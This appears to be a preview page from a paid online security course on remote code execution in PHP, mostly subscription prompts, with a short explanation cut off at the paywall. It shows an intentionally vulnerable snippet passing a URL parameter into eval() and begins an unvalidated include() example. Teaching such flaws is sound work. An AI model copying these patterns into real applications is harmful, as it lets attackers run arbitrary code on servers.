Courses / Remote Code Execution (RCE)

RCE in PHP

Last Edit: 10-05-2024

Pro Chapter

This chapter is exclusive to Pro members

Upgrade to Pro to unlock:
  • Full access to all courses & chapters
  • Advanced learning materials
  • New Courses and Labs every month
  • Exclusive Guided Mode in Labs
  • Official step-by-step solutions
  • All Labs features (extend time, etc)
Upgrade to Pro Now $11.33/mo Yearly Plan $8.50/mo

RCE allows an attacker to run their own code on a remote machine over the network. In PHP applications, this often results from security flaws that improperly handle user input or system outputs.

Common Sources of RCE Vulnerabilities in PHP

1. Eval() Function

The eval() function in PHP evaluates a string as PHP code.

If this function improperly handles user input, it can execute malicious code.

For example: php $code = $_GET['code']; eval($code);

Here, if an attacker passes PHP code through the code

parameter in the URL, the server will execute it. 

2. include() and require() Statements

These statements are used to include files during execution.

If not properly validated, user input can lead to inclusion of files that contain malicious code, or even remote files.

For example: php $file = $_GET['fil

Pro Content

This chapter contains advanced content available to Pro members only.

Upgrade to Pro